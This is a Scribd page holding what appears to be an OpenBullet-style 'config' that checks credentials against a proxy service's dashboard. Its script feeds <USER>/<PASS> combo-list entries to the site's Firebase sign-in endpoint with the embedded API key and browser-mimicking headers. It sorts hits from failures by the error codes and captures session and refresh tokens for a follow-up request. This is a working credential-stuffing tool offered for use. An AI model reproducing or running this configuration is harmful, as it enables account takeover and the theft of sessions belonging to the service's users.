0% found this document useful (0 votes)
38 views2 pages

Raor

The document contains settings for a bot including its name, suggested number of bots, maximum CPM, author, version, and other configuration details. It also includes a script that makes a request to an authentication endpoint to log in, checks for success or error responses, parses the response for a token and refresh token, and makes a request to register with another endpoint including those tokens in the header.

Uploaded by

kuhwin
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
Download as txt, pdf, or txt
0% found this document useful (0 votes)
38 views2 pages

Raor

The document contains settings for a bot including its name, suggested number of bots, maximum CPM, author, version, and other configuration details. It also includes a script that makes a request to an authentication endpoint to log in, checks for success or error responses, parses the response for a token and refresh token, and makes a request to register with another endpoint including those tokens in the header.

Uploaded by

kuhwin
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1/ 2

[SETTINGS]

{
"Name": "Raor",
"SuggestedBots": 1,
"MaxCPM": 0,
"LastModified": "2023-09-05T10:44:34.8827592+07:00",
"AdditionalInfo": "",
"Author": "Ken",
"Version": "1.4.5 [Anomaly]",
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": false,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"EncodeData": false,
"AllowedWordlist1": "",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"CaptchaUrl": "",
"Base64": "",
"Grayscale": false,
"RemoveLines": false,
"RemoveNoise": false,
"Dilate": false,
"Threshold": 1.0,
"DiffKeep": 0.0,
"DiffHide": 0.0,
"Saturate": false,
"Saturation": 0.0,
"Transparent": false,
"Contour": false,
"OnlyShow": false,
"ContrastGamma": false,
"Contrast": 1.0,
"Gamma": 1.0,
"Brightness": 1.0,
"RemoveLinesMin": 0,
"RemoveLinesMax": 0,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST
"https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?
key=AIzaSyAQoLvSG9Y0NGbdAUG3cMdJOj-8k_SwUyI"
CONTENT
"{\"returnSecureToken\":true,\"email\":\"<USER>\",\"password\":\"<PASS>\"}"
CONTENTTYPE "application/json"
HEADER "Host: identitytoolkit.googleapis.com"
HEADER "Connection: keep-alive"
HEADER "sec-ch-
ua: \"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Brave\";v=\"116\""
HEADER "X-Firebase-gmpid: 1:71898263489:web:97ffc3c4115b94539a0940"
HEADER "Content-Type: application/json"
HEADER "X-Client-Version: Chrome/JsCore/9.6.7/FirebaseCore-web"
HEADER "sec-ch-ua-mobile: ?0"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Accept: */*"
HEADER "Sec-GPC: 1"
HEADER "Accept-Language: en-US,en;q=0.7"
HEADER "Origin: https://dashboard.razorproxy.com"
HEADER "Sec-Fetch-Site: cross-site"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Content-Length: 78"

KEYCHECK
KEYCHAIN Failure OR
KEY "\"code\": 400"
KEY "EMAIL_NOT_FOUND"
KEY "INVALID_PASSWORD"
KEYCHAIN Success OR
KEY "\"kind\": \"identitytoolkit"

PARSE "<SOURCE>" LR "{\"id_token\":\"" "\"," -> VAR "TOKEN"

PARSE "<SOURCE>" LR "refreshToken\": " "\"" -> VAR "atk"

REQUEST PATCH "https://dashboard.razorproxy.com/api/register"

HEADER "Host: dashboard.razorproxy.com"


HEADER "Connection: keep-alive"
HEADER "sec-ch-
ua: \"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Brave\";v=\"116\""
HEADER "Accept: application/json, text/plain, */*"
HEADER "Content-Type: application/json"
HEADER "sec-ch-ua-mobile: ?0"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
HEADER "sec-ch-ua-platform: \"Windows\""
HEADER "Sec-GPC: 1"
HEADER "Accept-Language: en-US,en;q=0.7"
HEADER "Origin: https://dashboard.razorproxy.com"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-Mode: cors"
HEADER "Sec-Fetch-Dest: empty"
HEADER "Referer: https://dashboard.razorproxy.com/dashboard"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Content-Length: 978"

You might also like